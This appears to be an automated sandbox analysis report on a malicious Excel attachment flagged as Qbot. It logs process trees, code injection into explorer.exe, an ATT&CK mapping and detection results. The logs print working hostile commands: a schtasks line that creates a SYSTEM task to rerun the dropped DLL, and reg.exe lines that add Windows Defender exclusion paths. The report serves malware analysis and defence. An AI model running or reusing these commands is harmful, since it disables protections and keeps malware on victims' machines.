Source: C:\Windows\System32\reg.exe	Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........h.......N.......(...............	Jump to behavior
Source: C:\Windows\System32\reg.exe	Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn rzbsnuprv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:17 /ET 22:29
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Qukpmcii' /d '0'
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Xicyyyqnqeyf' /d '0'
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn rzbsnuprv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:17 /ET 22:29	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Qukpmcii' /d '0'	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Xicyyyqnqeyf' /d '0'	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Application Data\Microsoft\Forms

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREBE4.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@25/6@0/3

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 6_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,

6_2_1000D523

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 13_2_100030B7 StartServiceCtrlDispatcherA,

13_2_100030B7

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 13_2_100030B7 StartServiceCtrlDispatcherA,

13_2_100030B7

Source: CompensationClaim-1630636598-09282021.xls

OLE indicator, Workbook stream: true

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 6_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,

6_2_1000ABA3

Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \BaseNamedObjects\Global\{F7283DB5-08D2-499C-8239-7A22FAD70FB5}
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\{0F3B3E8B-D02A-4319-A2CB-E59F48A33254}
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{B10879F0-7D9D-4B34-A7DD-5DF6660C35C8}
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \Sessions\1\BaseNamedObjects\{B10879F0-7D9D-4B34-A7DD-5DF6660C35C8}
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \BaseNamedObjects\{0F3B3E8B-D02A-4319-A2CB-E59F48A33254}
Source: C:\Windows\SysWOW64\explorer.exe	Mutant created: \BaseNamedObjects\{F7283DB5-08D2-499C-8239-7A22FAD70FB5}

Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.619382227.0000000002780000.00000004.00000040.sdmp

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_02711000 push eax; mov dword ptr [esp], 000FFFFFh	6_2_027112EE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_0271455B push edx; mov dword ptr [esp], 00000003h	6_2_027145A5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_0271455B push edx; mov dword ptr [esp], 00F00000h	6_2_027145AE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001A00E push ebx; ret	6_2_1001A00F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001D485 push FFFFFF8Ah; iretd	6_2_1001D50E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001D4B6 push FFFFFF8Ah; iretd	6_2_1001D50E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10019D5C push cs; iretd	6_2_10019E32
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10019E5E push cs; iretd	6_2_10019E32
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1001BB29 push esi; iretd	6_2_1001BB2E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_000DA00E push ebx; ret	7_2_000DA00F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_000DD485 push FFFFFF8Ah; iretd	7_2_000DD50E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_000DD4B6 push FFFFFF8Ah; iretd	7_2_000DD50E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_000D9D5C push cs; iretd	7_2_000D9E32
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_000D9E5E push cs; iretd	7_2_000D9E32
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_000DBB29 push esi; iretd	7_2_000DBB2E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_01511000 push eax; mov dword ptr [esp], 000FFFFFh	13_2_015112EE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_0151455B push edx; mov dword ptr [esp], 00000003h	13_2_015145A5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_0151455B push edx; mov dword ptr [esp], 00F00000h	13_2_015145AE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_1001A00E push ebx; ret	13_2_1001A00F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_1001D485 push FFFFFF8Ah; iretd	13_2_1001D50E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_1001D4B6 push FFFFFF8Ah; iretd	13_2_1001D50E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_10019D5C push cs; iretd	13_2_10019E32
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_10019E5E push cs; iretd	13_2_10019E32
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_1001BB29 push esi; iretd	13_2_1001BB2E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0009A00E push ebx; ret	14_2_0009A00F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0009D485 push FFFFFF8Ah; iretd	14_2_0009D50E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0009D4B6 push FFFFFF8Ah; iretd	14_2_0009D50E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00099D5C push cs; iretd	14_2_00099E32
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00099E5E push cs; iretd	14_2_00099E32
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0009BB29 push esi; iretd	14_2_0009BB2E

Source: 44467.926671412[1].dat.0.dr	Static PE information: section name: .rdatat
Source: Drezd.red.0.dr	Static PE information: section name: .rdatat
Source: Drezd.red.7.dr	Static PE information: section name: .rdatat
Source: Drezd.red.14.dr	Static PE information: section name: .rdatat

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 6_2_1000DFAD LoadLibraryA,GetProcAddress,

6_2_1000DFAD

Persistence and Installation Behavior:

Uses cmd line tools excessively to alter registry or file data

Show sources

Source: C:\Windows\SysWOW64\explorer.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: reg.exe	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\Drezd.red
Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\Drezd.red
Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\Drezd.red	Jump to dropped file

Source: C:\Windows\SysWOW64\explorer.exe	File created: C:\Users\user\Drezd.red			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.926671412[1].dat			Jump to dropped file

Source: C:\Windows\SysWOW64\explorer.exe

File created: C:\Users\user\Drezd.red

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Windows\SysWOW64\explorer.exe

File created: C:\Users\user\Drezd.red

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Windows\SysWOW64\explorer.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn rzbsnuprv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:17 /ET 22:29

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 13_2_100030B7 StartServiceCtrlDispatcherA,

13_2_100030B7

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 448 base: 60102D value: E9 BA 4C AC FF			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 3068 base: 60102D value: E9 BA 4C A8 FF			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1172	Thread sleep count: 47 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 1592	Thread sleep time: -96000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2940	Thread sleep count: 52 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2028	Thread sleep count: 74 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2028	Thread sleep time: -88000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.926671412[1].dat

Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 6_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,

6_2_1000D01F

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000AEB4 FindFirstFileW,FindNextFileW,	6_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_000CAEB4 FindFirstFileW,FindNextFileW,	7_2_000CAEB4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_1000AEB4 FindFirstFileW,FindNextFileW,	13_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_0008AEB4 FindFirstFileW,FindNextFileW,	14_2_0008AEB4

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 6_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError,

6_2_10005F82

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 6_2_1000DFAD LoadLibraryA,GetProcAddress,

6_2_1000DFAD

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_000C5A61 RtlAddVectoredExceptionHandler,		7_2_000C5A61
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00085A61 RtlAddVectoredExceptionHandler,		14_2_00085A61

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F0000	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 60102D	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F0000	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 60102D	Jump to behavior

Allocates memory in foreign processes

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: C:\Windows\SysWOW64\explorer.exe base: F0000 protect: page read and write			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: C:\Windows\SysWOW64\explorer.exe base: F0000 protect: page read and write			Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 448 base: F0000 value: 9C	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 448 base: 60102D value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 3068 base: F0000 value: 9C	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 3068 base: 60102D value: E9	Jump to behavior

Yara detected hidden Macro 4.0 in Excel

Show sources

Source: Yara match

File source: CompensationClaim-1630636598-09282021.xls, type: SAMPLE

Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn rzbsnuprv /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:17 /ET 22:29	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Qukpmcii' /d '0'	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Xicyyyqnqeyf' /d '0'	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'	Jump to behavior

Source: explorer.exe, 00000007.00000002.881888888.0000000000BD0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000002.881888888.0000000000BD0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: explorer.exe, 00000007.00000002.881888888.0000000000BD0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 7_2_000C31C2 CreateNamedPipeA,

7_2_000C31C2

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 6_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

6_2_1000980C

Source: C:\Windows\SysWOW64\regsvr32.exe

6_2_1000D01F

Stealing of Sensitive Information:

Yara detected Qbot

Show sources

Source: Yara match	File source: 13.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.explorer.exe.c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.explorer.exe.c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.631006029.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.616094137.00000000001E0000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Qbot

Show sources

Source: Yara match	File source: 13.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.explorer.exe.c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.explorer.exe.c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.regsvr32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.631006029.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.616094137.00000000001E0000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter11	Windows Service3	Windows Service3	Masquerading121	Credential API Hooking1	System Time Discovery1	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Process Injection413	Disable or Modify Tools1	LSASS Memory	Security Software Discovery11	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scripting2	Logon Script (Windows)	Scheduled Task/Job1	Modify Registry1	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Service Execution2	Logon Script (Mac)	Logon Script (Mac)	Virtualization/Sandbox Evasion1	NTDS	Process Discovery3	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol21	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Native API1	Network Logon Script	Network Logon Script	Process Injection413	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Exploitation for Client Execution32	Rc.common	Rc.common	Scripting2	Cached Domain Credentials	System Information Discovery15	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
CompensationClaim-1630636598-09282021.xls	9%	ReversingLabs	Document-Excel.Downloader.Heuristic

Dropped Files

Source	Detection	Scanner	Label	Link
